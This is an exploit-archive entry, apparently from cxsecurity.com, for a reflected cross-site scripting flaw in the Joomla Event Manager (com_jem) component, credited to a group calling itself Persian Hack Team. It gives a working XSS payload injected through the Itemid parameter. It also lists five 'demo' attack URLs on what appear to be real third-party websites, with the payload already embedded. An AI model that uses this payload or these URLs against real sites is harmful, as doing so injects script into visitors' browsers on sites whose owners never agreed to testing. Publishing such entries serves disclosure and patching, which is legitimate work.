Joomla Event Manager (com_jem) - Cross Site Scripting

2016.05.11
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

###################### # Exploit Title : Joomla Event Manager (com_jem) - Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.joomlaeventmanager.net/download # Category: [ Webapps ] # Tested on: [ Win ] # Version: 2.x # Date: 2016/05/11 ###################### # # PoC: # itemid=[XSS] # Payload = ">Persian<svg%2Fonload%3Dconfirm(%2FMobhaM%2F)>Hack Team # Demo : # https://www.msuhilleXl.org/index.php?option=com_jem&view=eventslist&Itemid=293%20%20%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&limitstart=10 # http://fineartbazar.iXr/portal/index.php?option=com_jem&view=venue&id=22:2015-01-05-09-15-50&Itemid=465%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team # http://www.prestoXdigitators.com/index.php?view=eventslist&task=archive&option=com_jem&Itemid=562%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team # http://www.degrXootdiervoeders.nl/index.php?option=com_jem&view=eventslist&Itemid=145%20%20%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team # http://www.kuhXlo-realschule.de/index.php?option=com_jem&view=eventslist&task=archive&Itemid=72%20%20%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Greetz : Milad Hacking & FireKernel And All Persian Hack Team Members # Homepage : persian-team.ir ######################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top